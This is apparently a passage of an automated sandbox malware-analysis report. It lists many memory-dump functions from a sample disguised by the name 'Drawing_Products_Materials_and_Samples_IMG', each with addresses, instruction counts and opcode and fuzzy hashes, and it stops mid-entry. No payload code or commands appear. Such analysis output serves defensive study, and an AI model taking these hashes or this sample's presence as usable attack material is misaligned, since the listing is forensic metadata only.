                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c981e51c402097ac279aa180a8966d7d20e381cbfc50a669d96d8a7fbc076cdb
                                                                                      • Instruction ID: cef6ad53675f2c5272d4dc00145f29581a407c7f1420d245c55a327630774fbf
                                                                                      • Opcode Fuzzy Hash: c981e51c402097ac279aa180a8966d7d20e381cbfc50a669d96d8a7fbc076cdb
                                                                                      • Instruction Fuzzy Hash: 2DA192B5E012288FEB64DF6AC944BDDBBF2BF89300F14C1A9D808A7254DB345A85CF54
                                                                                      Function 37582008 Relevance: .2, Instructions: 222COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151341097.0000000037580000.00000040.00000800.00020000.00000000.sdmp, Offset: 37580000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37580000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5c9d8f49f0b30a5ee8afaa1e8f470c7c4cfc2c24c6a83e5d076b55e0eb843fdb
                                                                                      • Instruction ID: ef920d535aec4b36dd78cee24d1e79ec6941d44ba8f1c8d2bbf5e0674f4684a8
                                                                                      • Opcode Fuzzy Hash: 5c9d8f49f0b30a5ee8afaa1e8f470c7c4cfc2c24c6a83e5d076b55e0eb843fdb
                                                                                      • Instruction Fuzzy Hash: 2BA19475E01228DFEB58DF6AC944B9DBBF2BF89300F14C1AAD408A7250DB745A85CF51
                                                                                      Function 37582DD0 Relevance: .2, Instructions: 222COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151341097.0000000037580000.00000040.00000800.00020000.00000000.sdmp, Offset: 37580000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37580000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dbb44701a0ce81526317b83503a5912b57cedf921bb8b3a7ea6ba43f00a4b187
                                                                                      • Instruction ID: a7f3147fd567ef42e218c9605444671b9d3cb1f9eb6ae240a60730497e2a4ef5
                                                                                      • Opcode Fuzzy Hash: dbb44701a0ce81526317b83503a5912b57cedf921bb8b3a7ea6ba43f00a4b187
                                                                                      • Instruction Fuzzy Hash: 33A182B5E01218DFEB68DF6AC944B9DBBF2AB89300F14C1AAD408A7250DB745A85CF51
                                                                                      Function 37584288 Relevance: .2, Instructions: 222COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151341097.0000000037580000.00000040.00000800.00020000.00000000.sdmp, Offset: 37580000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37580000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: eef9ed33d0fbd6c955e18c44867ea72c41d618e7a3563496524f2af26865b720
                                                                                      • Instruction ID: 68142b1d5dabc94203ece85b780a62d9ee97d1463c83aff9bb156941b603a5e2
                                                                                      • Opcode Fuzzy Hash: eef9ed33d0fbd6c955e18c44867ea72c41d618e7a3563496524f2af26865b720
                                                                                      • Instruction Fuzzy Hash: 6DA19775E01228DFEB58DF6AC944B9DBBF2BF89301F14C1AAD408A7250DB345A85CF11
                                                                                      Function 375834B8 Relevance: .2, Instructions: 222COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151341097.0000000037580000.00000040.00000800.00020000.00000000.sdmp, Offset: 37580000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37580000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e0caf76013a36ad7c2136281bacc16b56575f183e1c4098ec23991146b9a543b
                                                                                      • Instruction ID: 142ac2c4e26ca0e77b65c36020ee3b94c11e0cb3520d5522939a9831fe2c025b
                                                                                      • Opcode Fuzzy Hash: e0caf76013a36ad7c2136281bacc16b56575f183e1c4098ec23991146b9a543b
                                                                                      • Instruction Fuzzy Hash: C6A173B5E012189FEB68DF6AC944B9DBBF2AB89300F14C1AAD40CA7250DB345A85CF55
                                                                                      Function 37583BA0 Relevance: .2, Instructions: 222COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151341097.0000000037580000.00000040.00000800.00020000.00000000.sdmp, Offset: 37580000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37580000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9bb9093fd38b3901473d80ad100928d1366119b83c56269d6e81a9100342f11b
                                                                                      • Instruction ID: f9ad9a048a237e3a726ed6aa6af0006d570f61d1b0e6cb6777d22b6dad130091
                                                                                      • Opcode Fuzzy Hash: 9bb9093fd38b3901473d80ad100928d1366119b83c56269d6e81a9100342f11b
                                                                                      • Instruction Fuzzy Hash: E0A1A474E052289FEB68CF6AC944B9DBBF2BF89300F14C1AAD40CA7250DB745A85CF50
                                                                                      Function 36A917B0 Relevance: .2, Instructions: 221COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2b1222e194d818dec690343d655acfb5cd4db703b36a98d2def99beaea7071f2
                                                                                      • Instruction ID: 944fa2d66efa19d50145d50a93fff3a916dca1772045b862d8b03166a8e12bb7
                                                                                      • Opcode Fuzzy Hash: 2b1222e194d818dec690343d655acfb5cd4db703b36a98d2def99beaea7071f2
                                                                                      • Instruction Fuzzy Hash: BCA182B5E012288FEB64DF6AC944BD9BBF2BF89300F14C1A9D808A7254DB745A85CF51
                                                                                      Function 37584970 Relevance: .2, Instructions: 221COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151341097.0000000037580000.00000040.00000800.00020000.00000000.sdmp, Offset: 37580000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37580000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c38c113b343aa36280026878f61e7c6c4539c3c3114ac11bfd13d67364427c13
                                                                                      • Instruction ID: fe1accfdf49c3667686bea458dc64b324288d19100bc2b415b72f2120d091d71
                                                                                      • Opcode Fuzzy Hash: c38c113b343aa36280026878f61e7c6c4539c3c3114ac11bfd13d67364427c13
                                                                                      • Instruction Fuzzy Hash: 4AA19475E01228DFEB68DF6AC944B9DBBF2BF89301F14C1AAD408A7250DB345A85CF51
                                                                                      Function 375826F0 Relevance: .2, Instructions: 221COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151341097.0000000037580000.00000040.00000800.00020000.00000000.sdmp, Offset: 37580000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37580000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b46bff210992d33ece722ed33445180a5c8be9c153ec29e1f24283f514c800f8
                                                                                      • Instruction ID: a295955a9858591965ed310e1731093237cfc9046b33866d4deebfcded535172
                                                                                      • Opcode Fuzzy Hash: b46bff210992d33ece722ed33445180a5c8be9c153ec29e1f24283f514c800f8
                                                                                      • Instruction Fuzzy Hash: FEA19475E01228DFEB68DF6AC944B9DBBF2BF89300F14C1AAD408A7250DB745A85CF51
                                                                                      Function 36A92EAC Relevance: .2, Instructions: 202COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0457aed3fe4804f1b74a90427c611cb962a6ca94cece0d3f227a399ae49f7f87
                                                                                      • Instruction ID: 1b0f5ae02e582716bf94d73dcb351a26be9438b95e966f88ba3f32e54d6df207
                                                                                      • Opcode Fuzzy Hash: 0457aed3fe4804f1b74a90427c611cb962a6ca94cece0d3f227a399ae49f7f87
                                                                                      • Instruction Fuzzy Hash: 2591CD74D102188FEB50DFA9C984BDCBBF1FF89314F208269E409AB291DB759985CF58
                                                                                      Function 37417708 Relevance: .2, Instructions: 202COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151214905.0000000037410000.00000040.00000800.00020000.00000000.sdmp, Offset: 37410000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37410000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d483af579626ba7442eea8a5d2cba4844de5138f260305a7d0742b8d54921e04
                                                                                      • Instruction ID: 78b6e278515a5f34ec46dcc424e191e97ba347fe52b17c71deb5afe33e65b261
                                                                                      • Opcode Fuzzy Hash: d483af579626ba7442eea8a5d2cba4844de5138f260305a7d0742b8d54921e04
                                                                                      • Instruction Fuzzy Hash: A791B274E00218CFEB54DFA9C990ADDBBB2BF89300F648129D815BB354DB356946CF54
                                                                                      Function 37410040 Relevance: .2, Instructions: 202COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151214905.0000000037410000.00000040.00000800.00020000.00000000.sdmp, Offset: 37410000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37410000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c724f18fa50e9e9ed7f13f23b71487e0a1051ba536ca6315c3fb102ac910ca8e
                                                                                      • Instruction ID: 7e5b7a278184ef98551a2cb890f2f12af60cf8ee9208a6a4ba817aee2f2ab610
                                                                                      • Opcode Fuzzy Hash: c724f18fa50e9e9ed7f13f23b71487e0a1051ba536ca6315c3fb102ac910ca8e
                                                                                      • Instruction Fuzzy Hash: 8E91A274E00218CFEB54DFA9C990ADDBBB2BF89310F608129D805BB354DB35A946CF54
                                                                                      Function 3740FB38 Relevance: .2, Instructions: 202COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151145187.0000000037400000.00000040.00000800.00020000.00000000.sdmp, Offset: 37400000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a195cd5fbec2d5530a69daad1250118346d7ccdf13819f3381a67163d2ab3ad0
                                                                                      • Instruction ID: 4bc74d4de3a25d39361f82d22b1158de07b87b4ab0454b8fb1ebfdd20eed482e
                                                                                      • Opcode Fuzzy Hash: a195cd5fbec2d5530a69daad1250118346d7ccdf13819f3381a67163d2ab3ad0
                                                                                      • Instruction Fuzzy Hash: D291A074E04218CFEB54DFA9C990AEDBBB2BF89300F608129D815BB358DB356946CF54
                                                                                      Function 37408470 Relevance: .2, Instructions: 202COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151145187.0000000037400000.00000040.00000800.00020000.00000000.sdmp, Offset: 37400000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a8c5aa991aadf23ba36c9b834a5aca356c94ed0bb2f563adeea87514e338cb56
                                                                                      • Instruction ID: 83a5462cf7d96d98d0ed0e5529da0bd780e4ab91c747b7cdc1e61d5b5eedcc03
                                                                                      • Opcode Fuzzy Hash: a8c5aa991aadf23ba36c9b834a5aca356c94ed0bb2f563adeea87514e338cb56
                                                                                      • Instruction Fuzzy Hash: 9391A174E00218CFEB54DFA9C990ADDBBB2BF89300F648129D805BB358DB356986DF54
                                                                                      Function 373685E8 Relevance: .2, Instructions: 184COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a64f8aed2256e6e190c992ef8cbbd248c99221c84a50af20cfd28f9a58bb20fe
                                                                                      • Instruction ID: 5feb934a95f76e0faa095354ef2f97f1324368e6334d782ddb9f0b04188f393a
                                                                                      • Opcode Fuzzy Hash: a64f8aed2256e6e190c992ef8cbbd248c99221c84a50af20cfd28f9a58bb20fe
                                                                                      • Instruction Fuzzy Hash: 3D81B1B4E003188FDB58CFAAD9987DDBBF2BF89304F20816AD419AB254DB345985DF50
                                                                                      Function 373698F9 Relevance: .2, Instructions: 182COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 73bd88fa0f9f9a7b8fb0d3f9cf753007fdf6ce29ea5929c22cb6b3507c5ff884
                                                                                      • Instruction ID: e8861d3b19cd456d04109e777201e892c6f4e95e892d565722aad7ed0c77b6ad
                                                                                      • Opcode Fuzzy Hash: 73bd88fa0f9f9a7b8fb0d3f9cf753007fdf6ce29ea5929c22cb6b3507c5ff884
                                                                                      • Instruction Fuzzy Hash: 2A61E975E012089FEB14DFE9D984BDDFBF6AF89314F14C129E808AB359EA319901CB50
                                                                                      Function 37584960 Relevance: .2, Instructions: 170COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151341097.0000000037580000.00000040.00000800.00020000.00000000.sdmp, Offset: 37580000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37580000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 577db0b3fcb71626ee4cf168c663bfe88a50817e3523a4a29211339734255d7d
                                                                                      • Instruction ID: 10b6f899f53b09df77ccc8e7c46218a9e26a84a3ea56f51bd40be4b57ff4d81d
                                                                                      • Opcode Fuzzy Hash: 577db0b3fcb71626ee4cf168c663bfe88a50817e3523a4a29211339734255d7d
                                                                                      • Instruction Fuzzy Hash: 72719775E016188FEB68CF6AC954B99FBF2BF89301F14C1EAD448A7254DB344A85CF50
                                                                                      Function 375826E1 Relevance: .2, Instructions: 169COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151341097.0000000037580000.00000040.00000800.00020000.00000000.sdmp, Offset: 37580000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37580000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 92ef56bf40ebdae44c98d4b425a876772c966fce9dbdf8fd9a906cf9908b6453
                                                                                      • Instruction ID: 19144d342016eb053dc5ba3d5ac3f5e0833faf4c0971801e35f454e0a964faef
                                                                                      • Opcode Fuzzy Hash: 92ef56bf40ebdae44c98d4b425a876772c966fce9dbdf8fd9a906cf9908b6453
                                                                                      • Instruction Fuzzy Hash: EE71A6B5E016188FEB28CF6AC944B99BBF2BF89300F14C1AAD448A7254DB744A85CF11
                                                                                      Function 36A90B2B Relevance: .2, Instructions: 166COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c61433c33a87142509652bcdbdfc9265cb3df2ae287fdcf1ee6bc28aead6bb2e
                                                                                      • Instruction ID: eaa4f1a5e816ff6128403ced7c50ec6c2d5a0971c0b562864170f7d6aa30833b
                                                                                      • Opcode Fuzzy Hash: c61433c33a87142509652bcdbdfc9265cb3df2ae287fdcf1ee6bc28aead6bb2e
                                                                                      • Instruction Fuzzy Hash: 50719575D05228CFEB64CF6AD9446DDBBF2BF89301F1090AAD408A7354DB349A86DF40
                                                                                      Function 36A917AD Relevance: .2, Instructions: 163COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b7fdf58fb3d2ea97fb946a35c406af1bc4d8dc5047c056d0094c031c670f3a73
                                                                                      • Instruction ID: 6a4247f8b98d88869bec2d9e28636ca774573aba6180aff177093192ff1439b4
                                                                                      • Opcode Fuzzy Hash: b7fdf58fb3d2ea97fb946a35c406af1bc4d8dc5047c056d0094c031c670f3a73
                                                                                      • Instruction Fuzzy Hash: 837184B5E016288FEB68CF6AC954B99BBF2BF89300F14C1A9D408A7254DB744A85CF51
                                                                                      Function 0011EBD8 Relevance: .1, Instructions: 149COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3d2c014fa4977e96296d2dd8ecb621a42f96068d05bf9e74ea8bcbe83e5bad87
                                                                                      • Instruction ID: 193fb908a720548e2cbd9613f95838c0c9c19063d5c1b80cb68dd11cc61756b6
                                                                                      • Opcode Fuzzy Hash: 3d2c014fa4977e96296d2dd8ecb621a42f96068d05bf9e74ea8bcbe83e5bad87
                                                                                      • Instruction Fuzzy Hash: A151B274E00208DFEB58DFAAD984A9DBBF2BF89300F248129E815BB365DB305941CF54
                                                                                      Function 0011EBD3 Relevance: .1, Instructions: 148COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 41cf24900d550f21e1acbe06478be52de408cf404bf83c9295fe1fc5a5786fa8
                                                                                      • Instruction ID: 3666439265462064dc8a3fdabb052431763a75500ded3f6a409cc2ef19cc1433
                                                                                      • Opcode Fuzzy Hash: 41cf24900d550f21e1acbe06478be52de408cf404bf83c9295fe1fc5a5786fa8
                                                                                      • Instruction Fuzzy Hash: F451B474E04208DFEB58DFAAD844A9DBBF2BF89300F249129E815AB365DB305942DF54
                                                                                      Function 0011D513 Relevance: .1, Instructions: 137COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 751c19b3f933932f403ce8ba6ebae3a3b3c6b64a8046885c3396667930bc01ec
                                                                                      • Instruction ID: 3a8eeb3e85ec5ed266d1c77735d6f7eb18f3a0c0fd3eab559f231060edcd2dda
                                                                                      • Opcode Fuzzy Hash: 751c19b3f933932f403ce8ba6ebae3a3b3c6b64a8046885c3396667930bc01ec
                                                                                      • Instruction Fuzzy Hash: 25519274E01208DFDB58DFAAD9949DDBBF2BF89300F209169E409AB365DB31A901CF50
                                                                                      Function 373D5FD0 Relevance: .1, Instructions: 124COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150954301.00000000373D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_373d0000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fb59d6976512254a61dfb3371bec2aeec0874882382422311bfa6eed27d17982
                                                                                      • Instruction ID: 208c6977b010b0c977a89a973dacbc3ac47fcaaa2fb2c9fdac4439794fee9a9b
                                                                                      • Opcode Fuzzy Hash: fb59d6976512254a61dfb3371bec2aeec0874882382422311bfa6eed27d17982
                                                                                      • Instruction Fuzzy Hash: 4C51F4B1D00608CBEB18DFAAC8447DEBBF2AF89304F20C16AD418BB295DB355946CF54
                                                                                      Function 37367B79 Relevance: .1, Instructions: 123COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 195dfe3b268480a8b334a8f526f76b42b9688434a15cdc6f6b21e895a8516634
                                                                                      • Instruction ID: 25eebf6e8ddfe2b79e4b624912ee1a1ccecb66b1a0ef4307585b446209b3f042
                                                                                      • Opcode Fuzzy Hash: 195dfe3b268480a8b334a8f526f76b42b9688434a15cdc6f6b21e895a8516634
                                                                                      • Instruction Fuzzy Hash: CE41F7B0D012088BEB18DFAAC8947DDBBF2BF89314F60C06AC418BB294DB755946CF54
                                                                                      Function 37583B90 Relevance: .1, Instructions: 117COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151341097.0000000037580000.00000040.00000800.00020000.00000000.sdmp, Offset: 37580000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37580000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4396243cd14fe5a3e81fa8ae363d2048d1ef2b38d2673b463aca510bb0dd7871
                                                                                      • Instruction ID: be3791d850f77dc8101e5860a3624a72a5eee28f6f09295ce738e14f79a6f807
                                                                                      • Opcode Fuzzy Hash: 4396243cd14fe5a3e81fa8ae363d2048d1ef2b38d2673b463aca510bb0dd7871
                                                                                      • Instruction Fuzzy Hash: 74518AB1E016189BEB68CF5BD8447DEFAF3AFC9200F14C5AAC40CAA254DB3449868F51
                                                                                      Function 37582DC1 Relevance: .1, Instructions: 113COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151341097.0000000037580000.00000040.00000800.00020000.00000000.sdmp, Offset: 37580000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37580000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: daf577b202723470b64bcb03b176d56b4300a6923d13f7dbced8f9d2841f992e
                                                                                      • Instruction ID: bc868d3b81618e1abf61fb02681c8d2377ea9a4db37ef949346a1573bbc3ed7a
                                                                                      • Opcode Fuzzy Hash: daf577b202723470b64bcb03b176d56b4300a6923d13f7dbced8f9d2841f992e
                                                                                      • Instruction Fuzzy Hash: F4416AB1E016188BEB58CF5BD95479EFAF3AFC9300F14C5BAC40CA6254DB740A868F51
                                                                                      Function 375834AA Relevance: .1, Instructions: 113COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151341097.0000000037580000.00000040.00000800.00020000.00000000.sdmp, Offset: 37580000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37580000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6d9648a05db437b2f8850c94079e96d0faa99e6f298a4ce5db21ed007f493ac4
                                                                                      • Instruction ID: aee3804a035e507232466ecbb42e2910f966417a4362ad3f7951ed6ddb08e5f1
                                                                                      • Opcode Fuzzy Hash: 6d9648a05db437b2f8850c94079e96d0faa99e6f298a4ce5db21ed007f493ac4
                                                                                      • Instruction Fuzzy Hash: E0417BB1E016189BEB58CF5BD94479EFAF3AFC9310F14C1BAC40CA6254DB340A868F51
                                                                                      Function 37581FF8 Relevance: .1, Instructions: 112COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151341097.0000000037580000.00000040.00000800.00020000.00000000.sdmp, Offset: 37580000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37580000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 22ee206bd96ffda5cbc6f3c06cc1b11a3ab8b51a0851b6338e98a15282ff1df3
                                                                                      • Instruction ID: 95f15b71b1641415d7f2cf35940269e3538b8c010c3dd492b40cd23c14d2c4b0
                                                                                      • Opcode Fuzzy Hash: 22ee206bd96ffda5cbc6f3c06cc1b11a3ab8b51a0851b6338e98a15282ff1df3
                                                                                      • Instruction Fuzzy Hash: 8E419C71E016588BEB58CF5BC85479AFAF3AFC9300F14C1BAC44CA6254DB740A858F51
                                                                                      Function 36A91E89 Relevance: .1, Instructions: 111COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d3b428ada45d7cc0869fee1d58cf070edcab9cf6e17e35888bf6378da228131c
                                                                                      • Instruction ID: 9123bf8289731dea6df0d20ed7f08569b4f1ac60116560d3cc3c1ff782564992
